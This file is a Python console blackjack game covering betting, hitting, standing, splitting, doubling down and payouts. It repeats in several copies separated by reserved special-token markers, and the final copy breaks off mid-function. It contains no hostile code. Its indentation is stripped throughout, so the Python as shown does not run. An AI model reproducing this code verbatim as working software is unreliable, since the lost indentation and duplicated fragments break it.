" Stand: To 'stand' means to stay with the current cards. \n"
)
print(
" Split: A player can 'split' only when the first two cards of his or her hand are the "
)
print(
' same. When this occurs, the player makes two separate piles, one with each '
)
print(
' identical card, and places a bet identical to the initial bet for the second '
)
print(
""" pile. Then, the player can hit or stand with each pile as in a normal round.
"""
)
print(
" Double Down: When a player chooses to 'double down', he or she can increase the current bet "
)
print(
""" by 100% in exchange for agreeing to stand after being dealt one more card.
"""
)
input('Ready to play? Hit any key to continue: ')
print()
def get_num_players():
num = input('How many people will be playing (up to 7)? Enter a number: ')
while not num.isdigit() or int(num) < 1 or int(num) > 7:
num = input('Please enter a number from 1 to 7: ')
print(
"""
Great! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).
"""
)
time.sleep(1)
return int(num)
def create_players(num):
players_list = []
for i in range(num):
name = input(f'Player {i + 1}, what is your name? ')
while name == '':
name = input('Please enter your name: ')
players_list.append(people.Player(name, 1000))
print(
'\nAll players will begin the game with the same amount of $1,000 dollars.\n'
)
return players_list
def deal(dealer, players):
for player in players[:-1]:
if not player.check_broke():
dealer.deal_card(player)
dealer.deal_card(players[-1])
def place_bets(players):
print('Now, each of you must place your bets.\n')
bets = []
for player in players[:-1]:
if not player.check_broke():
bet = input(f'Bet for {player.name}: ')
while not bet.isdigit() or int(bet) > player.money:
msg = 'Please enter a whole number: '
if bet.isdigit():
msg = (
"You don't have enough money! Enter a different value: "
)
bet = input(msg)
player.bet = int(bet)
print()
def view_hands(players):
print('Here are the hands for each player: \n')
for p in players:
if isinstance(p, people.Dealer):
print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')
print()
elif not p.check_broke():
print(f'{p.name}: {p.hand}', end='')
if p.check_blackjack():
print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')
else:
print()
print()
def do_decision(player, dealer, hand_index=0):
choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}
valid_choice = False
while not valid_choice:
choice = input(
f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '
)
while choice.lower() not in choices_dict.keys():
choice = input(
"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: "
)
valid_choice = choices_dict.get(choice)(player, dealer, hand_index)
def cycle_decisions(players):
dealer = players[-1]
for p in players:
if isinstance(p, people.Dealer):
print(
f"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11)."
)
sys.stdout.flush()
time.sleep(0.8)
if not check_status(p) and not p.check_hard_17():
hit(p, dealer)
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05)
if p.check_bust():
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
else:
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
if i.hand_value(j) > p.hand_value():
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
elif i.hand_value(j) < p.hand_value():
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
else:
print(
f'{i.name} tied with the {p.name}! No change. '
, end='')
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
sys.stdout.flush()
time.sleep(0.5)
elif not p.check_blackjack() and not p.check_broke():
do_decision(p, dealer)
def stand(player, dealer, hand_index=0):
print(f'{player.name} stands.\n')
return True
def hit(player, dealer, hand_index=0):
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if isinstance(player, people.Dealer):
while not player.check_hard_17() and not done:
time.sleep(0.5)
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
else:
choice = ''
if not done:
choice = input("Do you want to hit again ('y' or 'n')? ").lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
while choice == 'y' and not done:
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if not done:
choice = input("Do you want to hit again ('y' or 'n')? "
).lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
if not done:
print()
return True
def split(player, dealer, hand_index=0):
if player.hand[hand_index][0] != player.hand[hand_index][1]:
print(
"You can't split on that hand! You need two identical cards to split. Choose again."
)
return False
elif player.bet * 2 > player.money:
print(
f"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]
player.hand = hands
print('Now you will play each hand separately: \n')
for i in range(0, 2):
print(f'For Hand #{i + 1}: ')
do_decision(player, dealer, i)
return True
def double_down(player, dealer, hand_index=0):
if player.bet * 2 > player.money:
print(
f"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
elif player.did_double_down:
print('You can double down only once! Choose a different option.')
return False
player.bet *= 2
player.did_double_down = True
print(f'Bet increased to ${player.bet}!.')
do_decision(player, dealer, hand_index)
return True
def check_status(player, hand_index=0):
done = False
hand_string = '['
for card in player.hand[hand_index][:-1]:
hand_string += card.__str__() + ', '
print(f'Current Hand: {hand_string}', end='')
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)
time.sleep(0.5)
if player.check_blackjack(hand_index):
disp_str_slow(' ==> BLACKJACK!!! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
elif player.check_bust(hand_index):
disp_str_slow(' ==> BUST! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
else:
print()
return done
def play_again(players):
print()
all_broke = True
for i in players:
if not i.check_broke():
all_broke = False
if not all_broke:
choice = input(
"Do you all want to play another round? Enter 'y' or 'n': ").lower(
)
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
print()
return choice
else:
print()
return 'n'
def reset(players):
dealer = players[-1]
for player in players:
dealer.retrieve_cards(player)
player.bet = 0
def display_accounts(players):
for player in players[:-1]:
change = player.money - player.initial_money
word = 'gain'
if change < 0:
word = 'loss'
print(
f""" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}
"""
)
sys.stdout.flush()
time.sleep(0.5)
def disp_str_slow(phrase, t):
for i in phrase:
print(i, end='')
sys.stdout.flush()
time.sleep(t)
def print_players(players):
for player in players:
print(player)
def main():
display_instructions()
num_players = get_num_players()
players = create_players(num_players)
dealer = people.Dealer(Deck(6))
players.append(dealer)
replay_choice = 'y'
while replay_choice == 'y':
reset(players)
place_bets(players)
for i in range(0, 2):
deal(dealer, players)
view_hands(players)
cycle_decisions(players)
replay_choice = play_again(players)
print(
"""------------------------------------------------------------------------------------------------
"""
)
disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05)
sys.stdout.flush()
time.sleep(0.5)
display_accounts(players)
sys.stdout.flush()
time.sleep(0.2)
print(
"""------------------------------------------------------------------------------------------------
"""
)
print('Goodbye!')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def display_instructions():
print(
"""
Instructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 """
)
print(
'as possible without going over. The numbered cards have the value of their number, face cards have '
)
print(
"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\n"
)
print(
'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '
)
print(
"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the "
)
print(
"""dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down:
"""
)
print(
" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many "
)
print(
' times as wanted, up until the player busts (goes over 21). \n'
)
print(
" Stand: To 'stand' means to stay with the current cards. \n"
)
print(
" Split: A player can 'split' only when the first two cards of his or her hand are the "
)
print(
' same. When this occurs, the player makes two separate piles, one with each '
)
print(
' identical card, and places a bet identical to the initial bet for the second '
)
print(
""" pile. Then, the player can hit or stand with each pile as in a normal round.
"""
)
print(
" Double Down: When a player chooses to 'double down', he or she can increase the current bet "
)
print(
""" by 100% in exchange for agreeing to stand after being dealt one more card.
"""
)
input('Ready to play? Hit any key to continue: ')
print()
def get_num_players():
num = input('How many people will be playing (up to 7)? Enter a number: ')
while not num.isdigit() or int(num) < 1 or int(num) > 7:
num = input('Please enter a number from 1 to 7: ')
print(
"""
Great! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).
"""
)
time.sleep(1)
return int(num)
def create_players(num):
players_list = []
for i in range(num):
name = input(f'Player {i + 1}, what is your name? ')
while name == '':
name = input('Please enter your name: ')
players_list.append(people.Player(name, 1000))
print(
'\nAll players will begin the game with the same amount of $1,000 dollars.\n'
)
return players_list
def deal(dealer, players):
for player in players[:-1]:
if not player.check_broke():
dealer.deal_card(player)
dealer.deal_card(players[-1])
def place_bets(players):
print('Now, each of you must place your bets.\n')
bets = []
for player in players[:-1]:
if not player.check_broke():
bet = input(f'Bet for {player.name}: ')
while not bet.isdigit() or int(bet) > player.money:
msg = 'Please enter a whole number: '
if bet.isdigit():
msg = (
"You don't have enough money! Enter a different value: "
)
bet = input(msg)
player.bet = int(bet)
print()
def view_hands(players):
print('Here are the hands for each player: \n')
for p in players:
if isinstance(p, people.Dealer):
print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')
print()
elif not p.check_broke():
print(f'{p.name}: {p.hand}', end='')
if p.check_blackjack():
print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')
else:
print()
print()
def do_decision(player, dealer, hand_index=0):
choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}
valid_choice = False
while not valid_choice:
choice = input(
f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '
)
while choice.lower() not in choices_dict.keys():
choice = input(
"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: "
)
valid_choice = choices_dict.get(choice)(player, dealer, hand_index)
def cycle_decisions(players):
dealer = players[-1]
for p in players:
if isinstance(p, people.Dealer):
print(
f"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11)."
)
sys.stdout.flush()
time.sleep(0.8)
if not check_status(p) and not p.check_hard_17():
hit(p, dealer)
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05)
if p.check_bust():
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
else:
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
if i.hand_value(j) > p.hand_value():
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
elif i.hand_value(j) < p.hand_value():
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
else:
print(
f'{i.name} tied with the {p.name}! No change. '
, end='')
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
sys.stdout.flush()
time.sleep(0.5)
elif not p.check_blackjack() and not p.check_broke():
do_decision(p, dealer)
def stand(player, dealer, hand_index=0):
print(f'{player.name} stands.\n')
return True
def hit(player, dealer, hand_index=0):
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if isinstance(player, people.Dealer):
while not player.check_hard_17() and not done:
time.sleep(0.5)
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
else:
choice = ''
if not done:
choice = input("Do you want to hit again ('y' or 'n')? ").lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
while choice == 'y' and not done:
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if not done:
choice = input("Do you want to hit again ('y' or 'n')? "
).lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
if not done:
print()
return True
def split(player, dealer, hand_index=0):
if player.hand[hand_index][0] != player.hand[hand_index][1]:
print(
"You can't split on that hand! You need two identical cards to split. Choose again."
)
return False
elif player.bet * 2 > player.money:
print(
f"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]
player.hand = hands
print('Now you will play each hand separately: \n')
for i in range(0, 2):
print(f'For Hand #{i + 1}: ')
do_decision(player, dealer, i)
return True
def double_down(player, dealer, hand_index=0):
if player.bet * 2 > player.money:
print(
f"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
elif player.did_double_down:
print('You can double down only once! Choose a different option.')
return False
player.bet *= 2
player.did_double_down = True
print(f'Bet increased to ${player.bet}!.')
do_decision(player, dealer, hand_index)
return True
def check_status(player, hand_index=0):
done = False
hand_string = '['
for card in player.hand[hand_index][:-1]:
hand_string += card.__str__() + ', '
print(f'Current Hand: {hand_string}', end='')
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)
time.sleep(0.5)
if player.check_blackjack(hand_index):
disp_str_slow(' ==> BLACKJACK!!! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
elif player.check_bust(hand_index):
disp_str_slow(' ==> BUST! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
else:
print()
return done
def play_again(players):
print()
all_broke = True
for i in players:
if not i.check_broke():
all_broke = False
if not all_broke:
choice = input(
"Do you all want to play another round? Enter 'y' or 'n': ").lower(
)
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
print()
return choice
else:
print()
return 'n'
def reset(players):
dealer = players[-1]
for player in players:
dealer.retrieve_cards(player)
player.bet = 0
def display_accounts(players):
for player in players[:-1]:
change = player.money - player.initial_money
word = 'gain'
if change < 0:
word = 'loss'
print(
f""" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}
"""
)
sys.stdout.flush()
time.sleep(0.5)
def disp_str_slow(phrase, t):
for i in phrase:
print(i, end='')
sys.stdout.flush()
time.sleep(t)
def print_players(players):
for player in players:
print(player)
def main():
display_instructions()
num_players = get_num_players()
players = create_players(num_players)
dealer = people.Dealer(Deck(6))
players.append(dealer)
replay_choice = 'y'
while replay_choice == 'y':
reset(players)
place_bets(players)
for i in range(0, 2):
deal(dealer, players)
view_hands(players)
cycle_decisions(players)
replay_choice = play_again(players)
print(
"""------------------------------------------------------------------------------------------------
"""
)
disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05)
sys.stdout.flush()
time.sleep(0.5)
display_accounts(players)
sys.stdout.flush()
time.sleep(0.2)
print(
"""------------------------------------------------------------------------------------------------
"""
)
print('Goodbye!')
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from card import Card
from deck import Deck
import people
import chip
import sys
import time
def display_instructions():
print(
"""
Instructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 """
)
print(
'as possible without going over. The numbered cards have the value of their number, face cards have '
)
print(
"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\n"
)
print(
'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '
)
print(
"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the "
)
print(
"""dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down:
"""
)
print(
" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many "
)
print(
' times as wanted, up until the player busts (goes over 21). \n'
)
print(
" Stand: To 'stand' means to stay with the current cards. \n"
)
print(
" Split: A player can 'split' only when the first two cards of his or her hand are the "
)
print(
' same. When this occurs, the player makes two separate piles, one with each '
)
print(
' identical card, and places a bet identical to the initial bet for the second '
)
print(
""" pile. Then, the player can hit or stand with each pile as in a normal round.
"""
)
print(
" Double Down: When a player chooses to 'double down', he or she can increase the current bet "
)
print(
""" by 100% in exchange for agreeing to stand after being dealt one more card.
"""
)
input('Ready to play? Hit any key to continue: ')
print()
def get_num_players():
num = input('How many people will be playing (up to 7)? Enter a number: ')
while not num.isdigit() or int(num) < 1 or int(num) > 7:
num = input('Please enter a number from 1 to 7: ')
print(
"""
Great! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).
"""
)
time.sleep(1)
return int(num)
def create_players(num):
players_list = []
for i in range(num):
name = input(f'Player {i + 1}, what is your name? ')
while name == '':
name = input('Please enter your name: ')
players_list.append(people.Player(name, 1000))
print(
'\nAll players will begin the game with the same amount of $1,000 dollars.\n'
)
return players_list
def deal(dealer, players):
for player in players[:-1]:
if not player.check_broke():
dealer.deal_card(player)
dealer.deal_card(players[-1])
def place_bets(players):
print('Now, each of you must place your bets.\n')
bets = []
for player in players[:-1]:
if not player.check_broke():
bet = input(f'Bet for {player.name}: ')
while not bet.isdigit() or int(bet) > player.money:
msg = 'Please enter a whole number: '
if bet.isdigit():
msg = (
"You don't have enough money! Enter a different value: "
)
bet = input(msg)
player.bet = int(bet)
print()
def view_hands(players):
print('Here are the hands for each player: \n')
for p in players:
if isinstance(p, people.Dealer):
print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')
print()
elif not p.check_broke():
print(f'{p.name}: {p.hand}', end='')
if p.check_blackjack():
print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')
else:
print()
print()
def do_decision(player, dealer, hand_index=0):
choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}
valid_choice = False
while not valid_choice:
choice = input(
f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '
)
while choice.lower() not in choices_dict.keys():
choice = input(
"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: "
)
valid_choice = choices_dict.get(choice)(player, dealer, hand_index)
def cycle_decisions(players):
dealer = players[-1]
for p in players:
if isinstance(p, people.Dealer):
print(
f"{p.name} will hit until reaching a hand of at least 'hard' 17 (without an ace counting for 11)."
)
sys.stdout.flush()
time.sleep(0.8)
if not check_status(p) and not p.check_hard_17():
hit(p, dealer)
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05)
if p.check_bust():
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
else:
for i in players[:-1]:
if not i.check_broke():
sys.stdout.flush()
time.sleep(0.5)
print(' ', end='')
for j in range(0, len(i.hand)):
if not i.check_bust(j):
if i.hand_value(j) > p.hand_value():
print(f'{i.name} wins ${i.bet}! ', end='')
i.money += i.bet
elif i.hand_value(j) < p.hand_value():
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
else:
print(
f'{i.name} tied with the {p.name}! No change. '
, end='')
else:
print(f'{i.name} loses ${i.bet}! ', end='')
i.money -= i.bet
i.chips = chip.convert_to_chips(i.money)
if i.check_broke():
print(
f"Sorry {i.name}, but you're out of money and can no longer play in this game"
)
else:
print(
f'Current Balance: ${i.money} (Chips: {i.chips})'
)
sys.stdout.flush()
time.sleep(0.5)
elif not p.check_blackjack() and not p.check_broke():
do_decision(p, dealer)
def stand(player, dealer, hand_index=0):
print(f'{player.name} stands.\n')
return True
def hit(player, dealer, hand_index=0):
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if isinstance(player, people.Dealer):
while not player.check_hard_17() and not done:
time.sleep(0.5)
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
else:
choice = ''
if not done:
choice = input("Do you want to hit again ('y' or 'n')? ").lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
while choice == 'y' and not done:
dealer.deal_card(player, hand_index)
done = check_status(player, hand_index)
if not done:
choice = input("Do you want to hit again ('y' or 'n')? "
).lower()
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
if not done:
print()
return True
def split(player, dealer, hand_index=0):
if player.hand[hand_index][0] != player.hand[hand_index][1]:
print(
"You can't split on that hand! You need two identical cards to split. Choose again."
)
return False
elif player.bet * 2 > player.money:
print(
f"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]
player.hand = hands
print('Now you will play each hand separately: \n')
for i in range(0, 2):
print(f'For Hand #{i + 1}: ')
do_decision(player, dealer, i)
return True
def double_down(player, dealer, hand_index=0):
if player.bet * 2 > player.money:
print(
f"You don't have enough money to do that (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
elif player.did_double_down:
print('You can double down only once! Choose a different option.')
return False
player.bet *= 2
player.did_double_down = True
print(f'Bet increased to ${player.bet}!.')
do_decision(player, dealer, hand_index)
return True
def check_status(player, hand_index=0):
done = False
hand_string = '['
for card in player.hand[hand_index][:-1]:
hand_string += card.__str__() + ', '
print(f'Current Hand: {hand_string}', end='')
sys.stdout.flush()
time.sleep(0.5)
disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05)
time.sleep(0.5)
if player.check_blackjack(hand_index):
disp_str_slow(' ==> BLACKJACK!!! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
elif player.check_bust(hand_index):
disp_str_slow(' ==> BUST! ', 0.05)
if not isinstance(player, people.Dealer):
disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05)
print('\n\n', end='')
done = True
sys.stdout.flush()
time.sleep(0.5)
else:
print()
return done
def play_again(players):
print()
all_broke = True
for i in players:
if not i.check_broke():
all_broke = False
if not all_broke:
choice = input(
"Do you all want to play another round? Enter 'y' or 'n': ").lower(
)
while choice != 'y' and choice != 'n':
choice = input("Enter either 'y' or 'n': ")
print()
return choice
else:
print()
return 'n'
def reset(players):
dealer = players[-1]
for player in players:
dealer.retrieve_cards(player)
player.bet = 0
def display_accounts(players):
for player in players[:-1]:
change = player.money - player.initial_money
word = 'gain'
if change < 0:
word = 'loss'
print(
f""" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}
"""
)
sys.stdout.flush()
time.sleep(0.5)
def disp_str_slow(phrase, t):
for i in phrase:
print(i, end='')
sys.stdout.flush()
time.sleep(t)
def print_players(players):
for player in players:
print(player)
def main():
display_instructions()
num_players = get_num_players()
players = create_players(num_players)
dealer = people.Dealer(Deck(6))
players.append(dealer)
replay_choice = 'y'
while replay_choice == 'y':
reset(players)
place_bets(players)
for i in range(0, 2):
deal(dealer, players)
view_hands(players)
cycle_decisions(players)
replay_choice = play_again(players)
print(
"""------------------------------------------------------------------------------------------------
"""
)
disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05)
sys.stdout.flush()
time.sleep(0.5)
display_accounts(players)
sys.stdout.flush()
time.sleep(0.2)
print(
"""------------------------------------------------------------------------------------------------
"""
)
print('Goodbye!')
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from card import Card;
from deck import Deck;
import people;
import chip;
import sys;
import time;
def display_instructions() :
print('\nInstructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 ');
print('as possible without going over. The numbered cards have the value of their number, face cards have ');
print('a value of 10 each, and the ace can either be counted as 1 or 11 (player\'s choice)\n');
print('Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to ');
print('each player (up to 7 players) and to the dealer. The player\'s cards will be face up while one of the ');
print('dealer\'s cards will be face down. Then, each player will choose to either hit, stand, split, or double down: \n');
print(' Hit: when a player \'hits,\' he or she is dealt another card. A player can hit as many ');
print(' times as wanted, up until the player busts (goes over 21). \n');
print(' Stand: To \'stand\' means to stay with the current cards. \n');
print(' Split: A player can \'split\' only when the first two cards of his or her hand are the ');
print(' same. When this occurs, the player makes two separate piles, one with each ');
print(' identical card, and places a bet identical to the initial bet for the second ');
print(' pile. Then, the player can hit or stand with each pile as in a normal round.\n');
print(' Double Down: When a player chooses to \'double down\', he or she can increase the current bet ');
print(' by 100% in exchange for agreeing to stand after being dealt one more card.\n');
input('Ready to play? Hit any key to continue: ');
print();
def get_num_players() :
num = input('How many people will be playing (up to 7)? Enter a number: ');
while not num.isdigit() or int(num) < 1 or int(num) > 7:
num = input('Please enter a number from 1 to 7: ');
print('\nGreat! Now decide amongst yourselves the order you all will be playing in (who will be Player 1 through 7).\n');
time.sleep(1);
return int(num);
def create_players(num) :
players_list = [];
for i in range(num) :
name = input(f'Player {i+1}, what is your name? ');
while name == '':
name = input('Please enter your name: ');
players_list.append(people.Player(name, 1000));
print('\nAll players will begin the game with the same amount of $1,000 dollars.\n');
return players_list;
def deal(dealer, players) :
for player in players[:-1] :
if not player.check_broke() : dealer.deal_card(player);
dealer.deal_card(players[-1]); # dealer deals card to dealer, too
def place_bets(players) :
print('Now, each of you must place your bets.\n');
bets = [];
for player in players[:-1] : # doesn't reach dealer
if not player.check_broke() :
bet = input(f'Bet for {player.name}: ');
while not bet.isdigit() or int(bet) > player.money :
msg = 'Please enter a whole number: ';
if bet.isdigit() :
msg = 'You don\'t have enough money! Enter a different value: ';
bet = input(msg);
player.bet = int(bet);
print();
def view_hands(players) :
print('Here are the hands for each player: \n');
for p in players :
if isinstance(p, people.Dealer) :
print(f'{p.name}: [{p.hand[0][0]}, ?]', end='');
print();
else :
if not p.check_broke() :
print(f'{p.name}: {p.hand}', end='');
if p.check_blackjack() :
print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!');
else : print();
print();
def do_decision(player, dealer, hand_index=0) :
choices_dict = {'s':stand, 'h':hit, 'p':split, 'd':double_down};
valid_choice = False;
while not valid_choice :
choice = input(f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): ');
while choice.lower() not in choices_dict.keys() :
choice = input('Please enter either \'s\', \'h\', \'p\', or \'d\', corresponding to your choice: ');
valid_choice = choices_dict.get(choice)(player, dealer, hand_index);
def cycle_decisions(players) :
dealer = players[-1];
for p in players :
if isinstance(p, people.Dealer) :
print(f'{p.name} will hit until reaching a hand of at least \'hard\' 17 (without an ace counting for 11).');
sys.stdout.flush();
time.sleep(0.8);
if not check_status(p) and not p.check_hard_17() : hit(p, dealer);
sys.stdout.flush();
time.sleep(0.5);
disp_str_slow('\nEnd-of-Round Earnings: \n', 0.05);
if p.check_bust() :
for i in players[:-1] :
if not i.check_broke() :
sys.stdout.flush();
time.sleep(0.5);
print(' ', end='');
for j in range(0,len(i.hand)) : # this is to loop through each hand for a player (player would have multiple hands after splitting)
if not i.check_bust(j) :
print(f'{i.name} wins ${i.bet}! ', end='');
i.money += i.bet;
else :
print(f'{i.name} loses ${i.bet}! ', end='');
i.money -= i.bet;
i.chips = chip.convert_to_chips(i.money);
if i.check_broke() :
print(f'Sorry {i.name}, but you\'re out of money and can no longer play in this game');
else :
print(f'Current Balance: ${i.money} (Chips: {i.chips})');
else :
for i in players[:-1] :
if not i.check_broke() :
sys.stdout.flush();
time.sleep(0.5);
print(' ', end='');
for j in range(0,len(i.hand)) :
if not i.check_bust(j) :
if i.hand_value(j) > p.hand_value() :
print(f'{i.name} wins ${i.bet}! ', end='');
i.money += i.bet;
elif i.hand_value(j) < p.hand_value() :
print(f'{i.name} loses ${i.bet}! ', end='');
i.money -= i.bet;
else :
print(f'{i.name} tied with the {p.name}! No change. ', end='');
else :
print(f'{i.name} loses ${i.bet}! ', end='');
i.money -= i.bet;
i.chips = chip.convert_to_chips(i.money);
if i.check_broke() :
print(f'Sorry {i.name}, but you\'re out of money and can no longer play in this game');
else :
print(f'Current Balance: ${i.money} (Chips: {i.chips})');
sys.stdout.flush();
time.sleep(0.5);
else :
if not p.check_blackjack() and not p.check_broke() :
do_decision(p, dealer);
def stand(player, dealer, hand_index=0) :
print(f'{player.name} stands.\n');
return True;
def hit(player, dealer, hand_index=0) :
dealer.deal_card(player, hand_index);
done = check_status(player, hand_index);
if isinstance(player, people.Dealer) :
while not player.check_hard_17() and not done:
time.sleep(0.5);
dealer.deal_card(player, hand_index);
